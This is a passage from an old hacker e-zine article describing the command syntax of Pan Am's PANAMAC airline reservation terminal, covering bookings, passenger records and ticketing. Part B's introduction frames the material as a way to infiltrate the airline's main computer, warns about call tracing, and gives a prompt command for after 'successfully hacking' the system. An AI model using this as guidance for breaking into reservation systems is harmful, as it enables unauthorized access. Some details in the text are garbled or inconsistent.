it would like this:
>KIINFC (Type at the SOM)
The system will list car-rental related files.Then all they do is retrieve
it.
Station Information File (CITY INDEX)
------------------------------------
PANAMAC also contains information about specific cities.To display the
Index for a particular city, one is able to Key In (KI) and type in the
three letter city code. So lets say you wanted some information about
Atlanta : Type in:
>KIATL
This will display all of the files concerning Atlanta. Now to display a
particular file to view one would enter KIATL plus the the letter code of the
file name. Therefore if you wished to view the information on airports in
Atlanta enter:
>KIATLA
you will have a screen filled with all sorts of information about the Airports
in Atlanta.
Examples of some Catagories of G.I.N
------------------------------------
Index Help On
----- -------
KISKDE - What type of Aircraft is an AB3 ?
KIXXKU - What is the City Code for Kuala Lampur ?
KICCCG - What is the currency code for Greek money and whats it called ?
KITTA - What movies will be shown on the flights next month ?
KIIHCH - Is there an Inter-Continental Hotel in Columbo ?
KIBOMC - How many cigarettes are allowed for a passenger going to Bombay ?
KINYCV - Where can one go to get a Yellow Fever shot on N.Y ?
KIJFKT - How much will a taxi cost from JFK Airport into the city ?
KILONK - What time did a flight PA 56 arrive in London this morning ?
Its impossible to list all the Key Ins in this article. In future I may
write up an article listing all of these.
Part III
~~~~~~~~
Booking Pan Am Flights:
-----------------------
To ask Panamac which flights are available on a specific day, you type a
standard availability entry :
>A 6JUNNYCMIA0900
Lets break it down:
- The 'A' is always used.Its is the action code to request availability
- The '6' is the departure date
- The 'JUN' is obviously the first three letters of the month
- 'NYC' is the origin city where the flight is taking off
- 'MIA' is destination city which in this case would be Miami
- and the '0900' is the time desired
So therefore on a flight on 3rd of July from Nairobi to London at 1100 hours
would be:
>A3JULNBOLON1100 [spacing is optional]
When requesting availabity FROM/TO codes should be CITY codes.This
will allow Panamac to display the full schedule of flights operating
FROM/TO all airports in that city,beginning with the time requested.
For eg. If you request availability FROM/TO JFK,Panamac will only
display flights that operate FROM/TO JFK but If you request availabilty
FROM/TO NYC, Panamac will display flights operate FROM/TO JFK and LGA
Availabity Display:
-------------------
Panamac will display up to 6 lines of both direct and connecting services
beginning with the Pan Am flights closest to the time requested.
For eg: Lets assume that one the sales agent has made the following entry
from Newyork city to Frankfurt:
>A 18AUGNYCFRA1800
The Panamac will display the following output:
18 AUG-THU-PA HELI FREE PJ ALTERNATE SERVICE
1PA 72 PAJAYABOHA JFKFRA 1830 0745*1 74X DDD0 715
2PA 4 PAJAYABAHA JFKFRA 1800 1215*1 74* DDD1 1015
: : : : : : : : :
[and so on...]
Rememeber these are "Direct Flights" not connecting
Analyzing the first 2 lines:
---------------------------
line 1:
-------
18AUG-THU - The date you requested with the day of the week
PA HELO FREE - City Pair Message..Consists of general info
ALTERNATE SERVICES - Service other than than direct PA is programmed
Line 2:
-------
1 - Line number. PMC will display up to six lines of both direct and
connecting service beginning with those flights closer to the time
required
PA - PA is the airline code for Pan Am
72 - Flight number
PAJAYABOHA - wndi ation of classes for eg:
P - Premium First Class
J - Premuim Clipper Class (wide body aircraft)
Y - Mormal Eco Class
B - Apex fare
H - Bulk Fare
A - This indicate that the flight is available
0 - No seats available (ZER0)
JFKFRA - This will tell you the departure and the arrival.Only AIRPORT
CODES are used.
1830 - Departure time
0745 - Arrival time
*1 - This will show when the flight will arrive one day later
74X - [Self explanatory]
DDD - Indicates that meals are served if Blank then no meals served
0 - The NUMBER of time the flight will make a stop between the two airports
715 - Elapased flying timw in hours and minutes.
Sometimes after the entry of classes one may see "X plus to digits of the
week...For eg. "X13
This means that flights operates only on certain days of the week except
Mondays & Wednesdays. If blank then flights are everyday.
If no specific departure time is indicated by the passenger an availability
entry can be made indicating "A" for A.M , "P" for P.M and "N" for noon.
eg.
>P23FEBNYCAUS --> In this case the Panamac assumes that its 1700
Short selling
-------------
Lets say one of the availability display was as follows:
10DEC
4PA 754 JAYA JFKLHR 600 1200 74X S 0 6:00
The departure is from JFK to london's Hethro Airport
Now suppose you wanted to book 3 seats on this flight.They would enter as
follows:
> N3Y4
N - This the abb. for "need" for the Panamac
3 - Number os seats.In our case 3
Y - This is the class (Y in this case)
4 - This tells us the line number of the Display explained above
This method of booking seats is called short selling.[Short Sell]
incase you ever ever hear it.
The Panamac will respond with:
1PA 754 Y 10DEC JFKLHR HS3 600 1200
1 - This represents the numbers of flights the sales agent has booked
PA - The 2 letter code for PanhAm
714a- Is obviosly the flight #
Y - The class
10DEC - The date of departure from NYC
JFKLHR - Flight going from Newyork City to London
HS3 - (H)ave (S)old three seats confirmed
600 1200 - the the departure and arrival time
Connecting Flights:
-------------------
Many times a passenger travels from point of origin to final destination
by connecting from one flight to another at an intermediate point or points
This will be a single connection wehn only one point (City) is involved
and there is also a concept of "double connection" ... This obviously means
that the person changes flights at 2 cities.
While viewing the display a typical connecting flight would look like this
5PA 120 PAJAYABAHA 1DEC [ ]LON 600 1200 75X LLL0 600 400
It is a clearly visible that this is a connecting flight because we have the
elapsed time (600) and the total elapsed time of connecting service from
origin city to its destination (400)...Simple enough huh ?
Short selling is also done in this case.
Format used:
[ N ][# SEATS][CLASS][FROM A DISPLAY LINE][ITS CLASS][FROM LINE]
How to display a particular flight:
-----------------------------------
Assume that you have the following flight on an availability display
01JAN-FRI-
1PM 90 PAJAYABOHA LAXZRH 1030 0930*1 74X 2 1515
Suppose you make a reservation on flight 90, the 01JAN and want to ask
the sales agent where the flights stops en-route and what day the flight
arrives. This is what he/she will enter into PANAMAC...
>S PA 90 / 01JAN LAX
S - Code for schedule
PA90 - Carrier code & flight number
/ - A slash as a separator
01JAN - Departure date from boardpoint
LAX - is the broad point.The three letter airport code
Output will be:
SPA90/1JANLAX
LAX JFK ZRH STR TXL
1839 0930*1 1210*1 1400
1030 2015 1135*1 1255*1
Flight 90 departs Los Angeles (LAX) at 1030 and arrives New York (JFK) at
1839,leave New York at 2015, arrives Zurich at 0930 the next day because the
(*1) indicate it then leaves Zurich at 1135 that morning arrives in
Stuttgart (STR) 1200 ... and so on. .
Retrieving Itinerary
--------------------
It is sometimes necessary to view the booking. This is done by using the
"*" key on the right top of the keyboard.(THE DISPLAY KEY)
Then type in "I" for itinerary.
>* I
Response will look something like this:
1 PA 90 P 13DEC JFKFRA HS3 600 1200
2 PA 95 Y 15DEC JFKFRA HS3 700 1300
[and so on ....]
Cancelation :
-----------
To cancel the booking in line 2 from above example enter:
>X 2
This will cancel the second segment. The Panamac assumes that the flight
cancelled is going to be replace by another..so therefore the next flight
one books will become the second segment automatically.
Response:
NEXT REPLACES 2
FLT SEG RELATED FACTS HAS BEEN CANCELED
To cancel multiple itinerary just enter Function Key "XITN"
Response:
ITIN CNLD
Alternate Method: Segment Entries
---------------------------------
Sometimes the display is not necessary if you know the flight number,
Origin - Destination ,CLASS, date, # of seats.This is done by entering
whats called a "Flight Segment"...so if the flight is available then
Panamac will confirm the seats to you.
The "0" key on the keyboard is the "SEG" key.
For example if you wanted to book 4 seats from Newyork (JFK) to London's
Hethrow Airportt(LHR) in Premium First Class (P) on 3rd July FLIGHT 90
The sales agent would enter:
>0 PA 90 P 3JUL JFKLHR NN4
The "0" is the SEGment Identifier.The NN4 means you need 4 seats.
Erasing all Flights booked:
---------------------------
To ignore all flights booked.The sales agent would enter the IGNORE TRASACTION
Function Key.This is the key displayed as "IGN".The key is located fifth
from the right side of the function keys.
>I
response:
ALL TRANSACTIONS IGNORED
Part IV
-------
Single Connections:
------------------
One has to understand in this that sometimes direct connections are not
available and therefore a second location must be used.
There are also second degree connection(also known as double connections)
In this example, an availability request between LAX(los Angeles) and JFK
(John F. Kennedy N.Y) requires a connection at a single city. It would look
like this:
>A 20APR LAXJFK P [This is just an eg. In reality there is a connection]
Output:
SVC NOT AVAILABLE IN THE SYSTEM
%2 or #2
This response obviosly means that there is no connection going between
these two points.But after that you may get a percent followed by the month
or a number sign followed by the year. This (%) means that the service is going
to be offered in 2 months in this case or same applys for the year which is the
(#).
Therefore the agents have to know how to connect flights. They do supply them a
connection availablity chart on the side.
So lets say (just as an eg.) that there is a direct connection from the
airport in San Francisco(abb. SAN) to JFK and theres also a connection between
SAN to LAX.Then obviously SAN is used as a connecting airport.Therefore the
agent would enter:
>A 20APR LAXJFK P / 1 SAN 100 / 1
A 20APR LAXJFK P - This is a regular entry[See above for more on it]
/ - This slash has to be be there a separator(compulsory).Also shows
connection is to be made somewhere
1 - O.k this will be different as in 3 cases below:
1 - When you are sure that Pan am operates that particular route.
2 - When sure that Pan am does not travel that route or
3 - When not sure which one travels that route.
SAN - This is the first connector.
100 - Minimum connection time allowed at the airport.
/ - Second slash as a separator also compulsory
1 - This entry is for the airline you are connecting to in this case its
Pan Am.Use the third entry chart provided in the above eg.
Second Degree Connection[DOUBLE CONNECTIONS]:
-------------------------------------------
All one must do in this case is just add the another connection after the
single connection in the same form.So therefore in the above case if one wants
to go from LAX to JFK .He would have to go from:
LAX --> SAN -->[another connector airport] --> final destination JFK
--------------------------------------------------------------------
NOTE: PANAMAC cannot construct connections at a city if it entails connections
bettween different airports, i.e it cannot construct a connection if the
arrival is not LaGuardia(LGA) and departures is from JFK or arrive at CDG
and depart ORY .....Just imagine the havok it would create if one could do that
?
Flight Information:
------------------
PANAMAC provides the capability to display Flight/Arrival Departure Info
more commonly known as "FLIFO".FLIFO may be requested from the entire sequence
or for the selected broadpoint in an entry:
For example:
>2 PA 50 F 2APR MCO
2 - This is the FLIFO action code
PA 50 - is the flight number
F - This is the letter used for request departure/arrival info from selected
city.
2 APR - The date of the departure.
MCO - is the broad point
Output will be:
2 PA50F 2APR MCO
/MCO OFF 1529 MIA IN 1611 AN ON TIME ARRIVAL
/MIA OFF 1847 LHR IN 0733
This first entry would read as follows: Pan Am flight PA 50 departed at
1529 from MIA and arrived at 1611 - Will indicate on time and so on.
To request FLIFO for a selected broad point, Enter
2 PA50 A 4DEC LHR
A - This is the request for ARRIVAL/DEPARTURE info at the city in entry
4 DEC - The arrival date
LHR - London Hethro Airport which is the arrival city.
Output:
2 PA50 A 4DEC LHR
/MIA OFF 1847 IN 0733
/LHR OFF 1150 FBU IN 1488
Part V
------
Open Flights:
-------------
Often people who are not sure (or not stable:=)) will keep there flight open.
This has to be instructed into the Panamac.
Suppose the agent has made an entry of:
>1 PA 56 P 19APR LAXJFK HS1 1200 1600
The HS1 means that he has booked 1 seat as explained above also.
Here in the example the passenger wants a round trip ticket first class
an "open" return.Therefore it would be:
>0 PA 56 P JFKLAX QQ1
0 - Is the segment id (actually for the open)
PA - the ailine code
56 - is the flight number
P - is the class
QQ1 - This is the action code.Compulsory for the open flight booking
Response:
2 PA 56 P JFKLAX QQ1
This has actaully booked a round trip ticket from JFK - LAX "Open"
Schedule Displays:
------------------
Sometimes it is necessary to display which airlines fly a particular route
when not sure.
Suppose the agent wanted to find out the all the airline that travel at a
particular date from LAX to JFK then the entry would be:
>S 19APR LAXJFK A
S - Entry for the (S)chedule
19APR - Date
LAXJFK - Self exp.
A - Time ,here A.M (could be also P for P.M or N for noon)
Output:
19APR-SUN-
1TW 747 FYBQM LAXJFK 1200 1400 73S 0 111
etc...
etc...
In cases where theres is service only once or twice a week between 2 cities,
you might have to make more than one entry to request a schedule display.
Eg:
>S 1APR LHRSAN
(Do not enter time because you want 24 24 explained later)
Output:
NO MORE FOR DISPLAY LHRSAN
o.k this mean that there is no service between these 2 points on the day
requested.O.k the PANAMAC scans this 24 hours before and 24 hours after
the date and time.This means that it has already scanned 3 days.So the next
entry would be:
>S 3FEB LHRSAN
But if there is no flight offered between the 2 points then the system would
reply:
SVC NOT IN SYS
Arrival not Known(ARNK)
-----------------------
Suppose a passenger was flying from LAX to JFK then he/she decides to take a
bus from JFK to maybe CVA (Cincinati) then from there return to LAX. This would
be considered "Arrival Not Known" (ARNK). Lets say a passenger booked a flight
from LAX to JFK
1 PA 747 Y 10APR LAXJFK HS3 1200 1600
His route from JFK to CVA is not known. Therefore this will require the ARNK
function key. The entry would be:
>0 A (or the ARNK function key)
Output:
2 ARNK
Then lets assume that you have booked a return flight from CVA back to LAX then
if you list your Itinerary it would look like:
1 PA 747 Y 10APR LAXJFK HS3 1200 1600
2 ARNK
3 PA 745 Y 20APR CVALAX HS3 1700 2100
Inserting Segment Entries:
--------------------------
Mant times its necessary to Insert Segment while booking flights. Suppose a
person is flying from Albany (ALB) to Miami (MIA) and back. His segment would
look like:
1 PA 747 B 5ARP ALBMIA HS1 100 445
2 PA 747 B 10APR MIAALB HS1 1200 1545
Here the passenger is sure that he will return back to ALB on the 10 of APR no
matter what. Now he may proceed to book the rest of the mid flight he wishes to
take. So therefore after landing in Miami he wishes to fly to Orlando.Its
airport code is MCO for Mc Coy Int. Now the sales agent has to make insert a
segment after the first one.
Here is how it done:
>/ 1 [ Means Insert after segment #1]
/ - Symbol used to specify "Insert After Segment" Use the "/" or "IAS" key
1 - The Segment #.
The Panamac will respond with " NEXT FOLLOWS 1 ". This indicates that your
next entry will be after 1. After Inserting segments a "*I" is necessary to
renumber the segs. Also if you want to insert a segment before 1 then enter
(/ 0).
Part VI
-------
Inputing Name Entries:
----------------------
After the flights have been booked the second part is to input all the names
of the persons who are travelling.
O.k lets say 3 people were travelling together (Tom,Bill,Cathy and assuming
that their family name is Doe)
The entry that is made into the Panamac would be as follows:
> -4 DOE / BILL MR / CATHY MRS / TOM MSTR
" - " - The name entries has to start with a dash.
3 - Is the number of people travelling
DOE - Family name
/ - slashes are compulsory to separate names
BILL MR - bill first name and Mr. is self exp etc..
**Note SPACING IS NOT NEEDED **
The good thing about the Panamac is that the agent can assign up to 17 titles
to person which are aleardy hard core programmed:
COL.
GEN.
DR.
LCDR.
CPT.
LTCOL.
MR.
MRS.
MS.
STR.
MISS.
LT.
SGT.
ADM.
MAJ.
REV.
CDR.
Yes Pan Am carries more military personnel than anyother airlines which by the
way is a true fact. All other titles are just spelled out.
The name entries are counted after the first "/" for the NN3 in our case.
( NN3 as mentioned above means Needed 3)
However there is an easy to do this by using the "End Item" key which comes
out on the screen as an equal sign with a vertical bar across it. Its just
like the IBM ACII VALUE 216. Therefore intread of entering () the agent
would just use this key and continue his/her entries for eg:
Use "!" at home.
>-1SMITHS/JOHN MR @-1JOHNSON./CATHY MRS
The "@" represents the "End Item" Key only in our case.
Infant Names:
-------------
O.k Infant names are not booked into the Panamac but only entered. Infant
entries are ignored by stating it.This is done by entering a "I/".
Then the # of the Infant eg.
>-I / 1 JOHNSON / TWEETY MISS
Item Number / Passenger Number :
--------------------------------
Every persons are assigned an Item and Passenger number. Well it would be more
correct to say passengers.
Lets look at this entry:
-2SMITH/TOMMR/KATHYMS@-3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
Now to display the name field the agent would enter "*N"
Output:
1.2SMITH/TOMMR/KATHYMS 3.3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
Here 1.2 means - 1 is the Item Number assigned and 2 is the number of the
passengers etc.
There is a reason why the Item numbers is not consecutive. Its because there
are 2 names in the first entry then obviously b folliws es the next item number
. Also in this case the infant entries are also assigned a number.
Changing name entries:
----------------------
Sometimes its necessary to change names in the entries.This is done by the
"Change" key then just retyping the whole entry example:
1.2SMITHS/JOHBMR/MARYMRS
To chnage "Johb" to "John" the agent would enter:
-1 (Change key) 2SMITHS/JOHNMR/MARYMRS
Deleting entries is very simple.All the agent has to do is enter the Item #
and the Change Symbol (By the way the change symbol looks a square and
diagonals crossed in it.) and then press enter. From home you may use the "*"
and will work the same. So how does one delete one name from the an entry. That
question I will leave up to you guys to figure out.(Hint: Use the Passenger
number)
Inserting entries can be done in almost the same way by entering the
passenger number then the entry eg:
>-/1 -SMITH/CATMR
The first slash means "Enter after"..In our case the passenger #1.
Part VII
--------
Completing the Passenger Name & Record (PNR):
---------------------------------------------
The whole booking is not yet complete. The sales agent still have to fill three
important entries to complete the PNR.These are:
1) By who was the booking RECEIVED(passenger,militaty,T.agency,Company etc.)
2) The TELEPHONE abb. output is "FONE"
3) When the TICKETS will be issued
4) Remarks
5) The age of child if there's one travelling
The first three are mandatory to complete the PNR. Numbers 4 & 5 are optional
but the agents are encouraged to fill them out just for the records.
lets take a looks at the three mandatory ones. This article wont go over the
optional ones.
RECIEVED:
---------
This field as stated clearly above identifies the party who made the booking.
The characters cannot exceed over 19.The entry should always begin with a
"6".This hardcored to interpret the recieved entry.Then comes the name ef the`
person. For example:
>6 MR DAVIS
The title always has to come first in case unlike inputing name entries.
Lets say if Mr. Davis worked for the American Travel Agency.Then the entry
is specified as follows:
>6 MR DAVIS/AMERICANTR
To Display the Passenger Data - Use "* P"
And the Output of the Eg. above would look like:
RCVD/RLOC-MR DAVIS/AMERICANTR
RCVD - Received
RLOC - Record Locater and then the name.
Changing these entries is done by the CHANGE key using the same principal
of changing name entries.In this case use the field "6" then input change
symbol then retype the name.
TELEPHONE:
----------
The harcored field used here is "9" not "6".
This information is entered by first typing a 9 then the "Source Of Booking"
(SOB) [See table provided for this entry]
Then a mandatory "*" sign. The SOB relates to the 6th field as we will see.
Then comes the Phone number.
If a passenger (D) booked a flight the letter "H" for Home or "B" is followed
by the telephone number and if its an agency/commercial/Interline then the
name is used.
S.O.B Table:
------------
Direct (Passenger) - 9 D * Military - 9 G *
Government - 9 G * Commercial - 9 C *
Travel Agent - 9 A * Interline - 9 I *
Lets say you booked a flight and your phone number was 7185551234 and that was
your business number, the Entry made would be:
>9 D * 718/5551234 B
If the "*P" is invoked then it would display :
RCVD/RLOC -MR DAVIS
FONE-NYC-A 718/5551234 B
The "FONE" serves to indicate the Telephone field. The the NYC has nothing to
do with the NPA of the passengers phone number but it indicates the city
location of the Panamac set where the booking was made. The "A" after the NYC
is taken from the S.O.B table.
Passenger Relating:
-------------------
The first entry in the FONE field always belongs to the person/company/
Travel agency etc in the RCVD field. You can enter additional phone numbers
using the same format as the first FONE entry. On additional entries,you must
specify which passenger or passengers the phone number is for. This is done by
including in the FONE entry the PASSENGERS NAME NUMBER of the person(s)
who can be reached at that phone. This proccess is called PASSENGER RELATING
Lets say we have the entry:
1.2SMITH/JOHNMR/MARYMRS
1 PA 56 B 19APR JFKLAX HS2 600 1000
RCVD/RLOC-AMERICAN TR. AGENCY
FONE-NYC-A 718/555-1234 H
The Smiths, John & Mary have the same home fone number.Therefore passenger
1-2 have the same #s.This has to be specified into the PANAMAC by:
>9 1-2 A* 718/555-4321 H
To display NAME,ITINENARY,RCVD AND FONE at the same time enter:
>*R (Record)
Output:
1.2/SMITH/JOHNMR/MARY COL
1 PA 56 B 19APR JFKLAX HS2 600 1000
RCVD/RLOC-AMERICAN TR. AGENCY
FONE-NYC-A 718/555-1234 American Tr.Agency
2.1-2 NYC-A 718/555-4321 H
etc...
Changing entries is a simple task. Lets assume the sales agent wants to change
the first FONE entry which is for the Travel Agency.The command would be:
>9 1 (Change Symbol) A* [FONE number & and the name of the agency]
9 - fone entry
1 - First entry.(2.)would be the second FONE entry which is the Passenger home
fone number.( If there was a third entry it would start with (3.) and so
on..
A* - From SOB
Deletion of the entries I will leave you to figure out.
Address Entries & Payment:
--------------------------
The Address entries and the form of payment are included in FONE entry as
well. This was the Info is stored in the PNR until the time of ticketing.
Address: [Use same format]
>9 1-2 C* 42-95 ELM STREET / FLUSHING N.Y 10011
Payment:
>9 D * AX 1234 567 11111 EXP 9/90 MR DAN DAVIS
Ticket Entries:
---------------
The Entries in the Ticketing field tell us if the passengers already has a
ticket or when and how its going to be issued.(Mail etc.) or when its going to
be cancelled.A ticketing code is issued for these situations:
Ticket Codez
------------
W - Here ticket will be issued on the date entered. Passenger will
pick it up on that date.
U - The ticket is mailed here(TBM) on date entered
Q - Here the ticket will be given by the travel agency on date entered
O - Ticketed
The field used here is "7" hardcored for Ticketing purposes.
Typical entry:
>7 W APR19
Usually one day after is added to APR19 so that passenger has the whole day
to purchase the ticket. The entry then would look like:
>7 W APR20 * APR 19
The "*" is mandatory.
Mailing:
-------
Lets look at an example of TBM:
>7 U 19ARP * CK FOR CHECK
This is entered when waiting for the passengers check to arrive. On 19APR its
checked for arrival. If arrived then the tickets are mailed. If check is not
received then tickets are not mailed.
If the payment is made by a Credit Card then entry is:
>7 U 19APR * CC
This agent will refer to the fone field where the CC info is stored. Here the
ticket is mailed on the date issued.
Outside U.S travel agencies are given a Ticket Time Limit. The entry is:
>7 Q 5MAY
When showing PNR ticketed with the letter "O". Its not necessary to enter
a date, as the Panamac already enters it that the reservation is being ticketed
Enter:
>7 O [assume that the date today is 5may]
PANAMAC will display:
TKT-O 17APR NYC 000 [SINE OF THE AGENT WHO MADE THE ENTRY]
TKT-O - IS THE TICKET CODE
17APR - TODAYS DATE
MYC - PANAMAC SET LOCATION
000 - SEPARATOR
[ ] - SINE OF THE AGENT
If all passengers are having thier tickets issued at the same time and place,
passenger relating is not necessary. But, if the passengers have different
dates or ticketing arrangements then the entries must be made separately and
Passenger Name Related.
For eg. Assume there are 3 passengers on the PNR. Passenger 1 and 2 will call
for their tickets at the Pan Am office and June 3. Passenger 3 wants his ticket
mailed on June 6 and will pay by personal check. The entries are:
>7 1-2 W 3JUN
>7 3 U 6JUN * CK FOR CHECK
Output:
TKT-1-2 W03JUNNYC000[SINE OF AGENT] 2.3 U0JUNNYC000[SINE OF AGENT] CK FOR CHECK
Here the 1-2 is the first entry related to the passengers 1 & 2 and 2.3 is the
second entry related to passenger 3
NYC - location of P.set
Change/Delete :
---------------
Suppose the display for the ticket field was:
TKT-W08APRLAX000BS
Here the ticket will be issued on the 8th of APR. The Panamac set is located
in LAX(Los Angeles). Also after the sepater (000), the BS is just an example
of a SINE of the agent.
Lets assume today is 7th of APR and the passenger has come to pick it up.
The agent has to instruct the PANAMAC that its TICKETED. Therefore he/she
would enter :
>7 1 (Change Symbol) O
Here:
7 - This is the field of the ticketing
1 - is the entry number
O - New Information
One has to remember that if changing related TKT entry then just enter
Passenger Name number after the Change Symbol. Then the new Inforamtion. It may
look like "7 1 (Change Symb.) 1-2 W 19APR"
To delete an entry just enter Field , Entry # then the Change Symb.
End Trasaction:(ET)
-------------------
The PNR is now complete. After completing it the agent must End Transaction
(ET).This key is located as one of the function keys.
>ET
Output:
A OK 4SW#32G
The 4SW#32G is called the RAD NUMBER or RECORD LOCATER or PNR ADDRESS.
After Ending Trasaction the PANAMAC will send a message to all the airline
in the Itinenary advising them of the flights the agents have booked/requested
and name of passenger.
SHELL PNRS
----------
Some records like travel agencie's accounts, corporate accounts and thier FT
number, Tel #, Address etc. have to be stored
permanently in the PNR. Therefore Panamac has what called SHELL PNRs.
Here file will become a permanent and reusable record.
A shell PNR can be retrieved by the account number, Telephone number and
ARC (Airline Reporting Corporation) or IATA(International Air Transport
Association). The ARC/IATA use last 5 Digits numeric plus check digit
The entry to display a shell PNR before beginning normal PNR creation
begins with the letters "RP" then a "*" then comes the Account Number.
Example:
>RP*7183589901
Ouput would be:
NYC PA A QH 24FEB88 2034
NO NAMES
NO ITIN
FONE-NYC-A 718/358-9901/*ARC 413453
2.NYC-A AMERICAN
TKT-024FEBNYC000BS DKIR
RMARS-*
The Itinenary may now be booked and the PNR completed as usual. Shell PNRs
may also be retrieved using the following entries:
ARC/ATC # - RP*ATC494340 [use last 5 numbers numeric plus check digit]
IATA # - RP*ITA945934 [Also use last 5 numeric plus D.C]
Account Code Number - RP*ACN7734 (In some countries only]
Shell PNRs can be merged with PNRs by just entering a "M" after the RP.
Retreiving a PNR:
-----------------
After the sales agent completes a PNR. It is sent to the Master Computer at
Rockleigh,N.J. To retreive a PNR , enter "*" and the PNR ADDRESS or by using
the flight,date and boarding off and on points and name of passenger eg:
>* PA 56/10AUG MIANYC - DAVIS
The hyphen is mandatory here.
The Panamac's output will be:
PA56/10AUG MIANYC - DAVIS
01 3DAVIS/TOMMR/CATHYMRS/FIFIMS
02 1DAVIDSON/SHASHI
:
etc
:
To retrieve the entries just choose the line number then enter:
>*2
The "*" has to be there or errors will ocurr. [No comand probably]
Anyway the "*2" will give you the account for Davidson.
To cancel a PNR you retrive just enter the "IXTN" in the fuction keys.
END OF PART A
-------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume #2: Phile #6 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
\ /
/ The Pan Am Airline Computers (c)1994 "PART B" \
\ --------------------------------------------- /
/ \
\ By Red Knight /
/ \
\ A P/HUN Magazine Incorporation Productions /
/ \
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
Introduction & clearing up a confusion
--------------------------------------
Welcome to Part B of "The Pan-Am Airline Computers". I hope you have found the
first part intresting.
I would like to take this opportunity in clearing up a minor confusion that
some of you may have while reading the first part of this file.
There are 2 types of systems I talk about in the first part which are:
o Pan-Am main computer &
o The Panamac or PANAMAC
The Pan-Am main computer is used to store and view performance of the entire
network. Pan American has 3 main computer systems to serve the surrounding
states. These are located in Florida, Washington and NewJersey. There may
exsist one in California but we dont have enough proof to be sure.Although they
may have smaller terminals connected to these 3 major terminals and all the
material that is covered here also applies for these smaller terminals.
The Panamac are computers that are used by sales agents to book flights, give
information and the works. Although the Pan-Am main computer can also handle
all the tasks that the PANAMAC can. Here is what the the Pan Am network looks
like:
Example of a simplified Pan Am Network
--------------------------------------
Cartridge & The Panamacs will be in the same
building. Like the major Pan Am building
in Manhatten in Newyork.
_____________________________________________
Sub Terminals | |
| +------ & Other +---- Panamac
+-------|-+ airlines ______________ |---- Panamac
| Pan-Am | +----------+ + + |---- Panamac Sales Agents
| main |--| Sub |--|Cartridge Area|---|---- Panamac on each terminal
| computer| | Terminal | +______________+ |---- Panamac
+---------+ +----------+ |---- Panamac
| |______________ +---- Panamac
Sub Terminal Other Agencies
The cartridge area is where they insert physical cartridges for new rates
of travelling, new routes , cancellation of rountes etc. The Panamac uses
all this information supplied by the cartridge area so that the Sales agents
can answer our various questions and book us flights. The cartridge area
contains the main program for the Panamac's to run. All the information from
the cartridge area is passed to the sub terminal then to the main computer
The surrounding states may connect to one or many sub terminals then finally
leading to the main computer. Our main purpose here is to infiltrate the main
computer where all the information is stored and has control over the entire
network that it serves. I have heard from employees that Pan-Am has the latest
on ANI equipment and therefore please proceed with caution.
Another thing is that when you have successfully hacked the system and you dont
get the SOM ">" prompt then type in ">SOMTERM" and hopefully you will
end up with the SOM.
I hope this has cleared the confusion and now lets continue.
Part VIII
---------
Host Facts
----------
The Host facts field contains 2 types of entries:
Other Service Information (OSI) entries which give information about passenger
so that they can be offered proper assistance or recognition.
A passengers speaks (SPKS) only a language other than English or Meet and
assist (MAAS) and this passenger is elderly and needs assistance.
Into the OSI goes anything pertinent from age to language, that they should
know in order to talk to the passwngers as an individual.
All the entries in the FAX field begin with digit 4. The code "PA" os used
to send message to Pan Am only, This special information is entered as follows:
>4 OSI PA_MAAS PSGR ELDERLY ASSIT IN TRANSIT
A space is madatory only after PA then free form test is permitted. OSI
information will be transmitted to the airport so that the appropriate action
may be taken. In addition, special 4 chracter codes are to be used if the OSI
details are to be taken transmitted directly to the airport check system.
>4 OSI PA SPKS SPANISH ONLY
>4 OSI PA FRTV PA62634678J-STARK/AMR
If the passenger's description does not match one of the codes listed in the
system enter the information as free form test after the
"PA"
For eg.
>4 OSI OA VIP MAYOR OF N.Y
In addition there is a special format to indicate that a passenger is an infant
(INF) which include the age indicated in months (1yr=12MTS)
For eg.
>4 OSI PA INF DAVIDSON/JR MSTR 5MTHS
Note: If there are two or more infants traveling, seperate OSI entries must
be made for each other
Part IX
--------
Special Service Requirements (SSR) entries which require prior arrangements
for something special to be provided to the passenger at the airport or on
the plane.
Entries in this category arrange for a specific item. (e.g. special meal)
to be provided on a flight for the passenger, or to advice the Airport the
passenger is traveling with something which may require advance preparation:
e.g a large pet in cargo or a large amount of excess baggage. Since we are
requesting that a specific items be provided (e.g special meal be put
on the flight), the entry is made with an action code. At the same time, the
entry is related to a specific segment(s) in an intinenary and to a particular
passenger name(s) in the PNR. We need to look at an example. Here is a PNR:
1.1 SHAH/BUPENDRA 2.1EZRA/AMR
1 PA 66 P 19APR JFKBOM HS2 2145 0015
RCVD/RLOC-MR SHAH
FONE-NYC-D 212/555/1234/H
TKT-026FEBNYC00020
Mr. Shah wants a vegetarian meal. Here is the entry:
>4 A VGML FS1 S1 N1
Lets break this down:
4 - 4 field
A - Means add SCR
VGML - Vegetarian meal code
FS1 - Action Code (free sell ) + Number requested.
S1 - Related to Segment 1
N1 - Related to Name number 1
Look at this PNR carefully. The entry relates the special meal in this case
vegetarian to the first segment (S1) and to the first passenger, Mr. Shah,
who is name number 1 (N1). When re-displayed, the HA FAX field appears as
follows:
HA FAX-SSRVGML.PAHS01 PA0066P19APRJFKBOM 1SHAH/BUPENDER
Information about Pan Am policy and procedures governing some SSR entries can
be found in KISSR. Here is a display of the index:
SSR STATION INFORMATION
INDEX
BASSINETS B
SPECIAL MEALS S
WHEELCHAIRS W
In the KISSR you will find description and codes for all special meals and
facts about the current meal and wheelchair policy.
Not all SSR items may be freely sold (FS). The R.M describes the procedure
for requesting (needing) special service requirements. For example, request
(NN) on:
Special meals within 8 hours of departure
or
Excess baggage over 150 kilos (350 lbs)
Looks at this example:
Mr. C. Tuc in addition to his free allowance has baggage which will weigh
about 175 Kkilos. The entry will be:
>4A XBAG NN 175KGS S1 N2 . RECORDING EQUIPMENT
XBAG - This is the excess baggage code
NN - Action code
175KGS - Weight in Kilos
S1 - Segment number
N2 - Name number 2
. - This separator which is compulsory
RECORDING EUIPMENT - Text
In this case there is also a description of the excess baggage. The description
